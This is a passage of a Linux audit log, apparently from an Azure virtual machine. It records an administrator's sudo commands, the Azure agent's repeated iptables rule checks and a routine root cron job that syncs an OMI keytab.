+type=PATH msg=audit(1551487434.901:763): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487434.901:763): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487434.901:763): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487436.365:764): arch=c000003e syscall=59 success=yes exit=0 a0=561e083c1330 a1=561e083d7c30 a2=561e083cc870 a3=8 items=2 ppid=15564 pid=19210 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=237 comm="sudo" exe="/usr/bin/sudo" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487436.365:764): argc=3 a0="sudo" a1="auditctl" a2="-l"
+type=CWD msg=audit(1551487436.365:764): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487436.365:764): item=0 name="/usr/bin/sudo" inode=4359 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487436.365:764): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487436.365:764): proctitle=7375646F00617564697463746C002D6C
+type=USER_CMD msg=audit(1551487436.369:765): pid=19210 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D6C terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487436.369:766): pid=19210 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487436.369:767): pid=19210 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487436.369:768): arch=c000003e syscall=59 success=yes exit=0 a0=55f378b4a958 a1=55f378b4ae68 a2=55f378b535e0 a3=0 items=2 ppid=19210 pid=19211 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=237 comm="auditctl" exe="/sbin/auditctl" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487436.369:768): argc=2 a0="auditctl" a1="-l"
+type=CWD msg=audit(1551487436.369:768): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487436.369:768): item=0 name="/sbin/auditctl" inode=12059 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487436.369:768): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487436.369:768): proctitle=617564697463746C002D6C
+type=USER_END msg=audit(1551487436.373:769): pid=19210 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487436.373:770): pid=19210 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487439.909:771): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd06696670 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19213 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487439.909:771): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487439.909:771): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487439.909:771): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487439.909:771): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487439.909:771): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487439.909:772): arch=c000003e syscall=59 success=yes exit=0 a0=5649f5850bb8 a1=5649f5850b70 a2=5649f5850b88 a3=7f44f2c65810 items=2 ppid=19213 pid=19214 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487439.909:772): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487439.909:772): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487439.909:772): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487439.909:772): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487439.909:772): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487439.913:773): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd06696670 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19215 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487439.913:773): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487439.913:773): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487439.913:773): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487439.913:773): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487439.913:773): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487439.913:774): arch=c000003e syscall=59 success=yes exit=0 a0=55f6219bf7e0 a1=55f6219bf728 a2=55f6219bf7b0 a3=7f7b0bf94810 items=2 ppid=19215 pid=19216 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487439.913:774): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487439.913:774): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487439.913:774): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487439.913:774): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487439.913:774): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=USER_ACCT msg=audit(1551487441.397:775): pid=19217 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487441.397:776): pid=19217 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487441.397:777): pid=19217 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=286 res=1
+type=USER_START msg=audit(1551487441.397:778): pid=19217 uid=0 auid=0 ses=286 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=SYSCALL msg=audit(1551487441.397:779): arch=c000003e syscall=59 success=yes exit=0 a0=55bc3be5e246 a1=7fff576f64f0 a2=55bc3be5e2f0 a3=7fff576f6590 items=2 ppid=19217 pid=19218 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=286 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487441.397:779): argc=3 a0="/bin/sh" a1="-c" a2=5B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29205D202626202F6F70742F6F6D692F62696E2F737570706F72742F6B747374726970202F6574632F6B7262352E6B6579746162202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162203E2F6465762F6E756C6C20323E2631207C7C2074727565
+type=CWD msg=audit(1551487441.397:779): cwd="/root"
+type=PATH msg=audit(1551487441.397:779): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487441.397:779): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487441.397:779): proctitle=2F62696E2F7368002D63005B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F
+type=CRED_DISP msg=audit(1551487441.401:780): pid=19217 uid=0 auid=0 ses=286 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487441.401:781): pid=19217 uid=0 auid=0 ses=286 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=SYSCALL msg=audit(1551487444.925:782): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0458ee70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19219 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487444.925:782): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487444.925:782): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487444.925:782): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487444.925:782): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487444.925:782): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487444.925:783): arch=c000003e syscall=59 success=yes exit=0 a0=55df3aee4bb8 a1=55df3aee4b70 a2=55df3aee4b88 a3=7febe7483810 items=2 ppid=19219 pid=19220 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487444.925:783): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487444.925:783): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487444.925:783): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487444.925:783): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487444.925:783): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487444.925:784): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0458ee70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19221 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487444.925:784): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487444.925:784): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487444.925:784): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487444.925:784): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487444.925:784): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487444.929:785): arch=c000003e syscall=59 success=yes exit=0 a0=55e418e087e0 a1=55e418e08728 a2=55e418e087b0 a3=7f560a713810 items=2 ppid=19221 pid=19222 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487444.929:785): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487444.929:785): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487444.929:785): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487444.929:785): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487444.929:785): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487449.041:786): arch=c000003e syscall=59 success=yes exit=0 a0=561e084df5f0 a1=561e084de8c0 a2=561e083cc870 a3=8 items=2 ppid=15564 pid=19223 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=237 comm="sudo" exe="/usr/bin/sudo" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487449.041:786): argc=3 a0="sudo" a1="tail" a2="/var/log/audit/auditd.log"
+type=CWD msg=audit(1551487449.041:786): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487449.041:786): item=0 name="/usr/bin/sudo" inode=4359 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487449.041:786): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487449.041:786): proctitle=7375646F007461696C002F7661722F6C6F672F61756469742F6175646974642E6C6F67
+type=USER_CMD msg=audit(1551487449.049:787): pid=19223 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=7461696C202F7661722F6C6F672F61756469742F6175646974642E6C6F67 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487449.049:788): pid=19223 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487449.049:789): pid=19223 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487449.053:790): arch=c000003e syscall=59 success=yes exit=0 a0=55b4a9644958 a1=55b4a9644e68 a2=55b4a964fdb0 a3=0 items=2 ppid=19223 pid=19224 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=237 comm="tail" exe="/usr/bin/tail" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487449.053:790): argc=2 a0="tail" a1="/var/log/audit/auditd.log"
+type=CWD msg=audit(1551487449.053:790): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487449.053:790): item=0 name="/usr/bin/tail" inode=4206 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487449.053:790): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487449.053:790): proctitle=7461696C002F7661722F6C6F672F61756469742F6175646974642E6C6F67
+type=USER_END msg=audit(1551487449.053:791): pid=19223 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487449.053:792): pid=19223 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487449.937:793): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0657ab50 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19225 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487449.937:793): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487449.937:793): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487449.937:793): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487449.937:793): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487449.937:793): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487449.937:794): arch=c000003e syscall=59 success=yes exit=0 a0=55c0cec55bb8 a1=55c0cec55b70 a2=55c0cec55b88 a3=7f37fe711810 items=2 ppid=19225 pid=19226 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487449.937:794): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487449.937:794): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487449.937:794): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487449.937:794): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487449.937:794): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487449.941:795): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0657ab50 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19227 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487449.941:795): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487449.941:795): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487449.941:795): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487449.941:795): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487449.941:795): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487449.941:796): arch=c000003e syscall=59 success=yes exit=0 a0=561f9fabe7e0 a1=561f9fabe728 a2=561f9fabe7b0 a3=7f3f050ec810 items=2 ppid=19227 pid=19228 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487449.941:796): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487449.941:796): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487449.941:796): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487449.941:796): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487449.941:796): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487454.949:797): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662bc70 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19229 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487454.949:797): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487454.949:797): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487454.949:797): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487454.949:797): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487454.949:797): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487454.953:798): arch=c000003e syscall=59 success=yes exit=0 a0=55cb0e34dbb8 a1=55cb0e34db70 a2=55cb0e34db88 a3=7f130f0da810 items=2 ppid=19229 pid=19230 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487454.953:798): argc=2 a0="iptables" a1="--version"
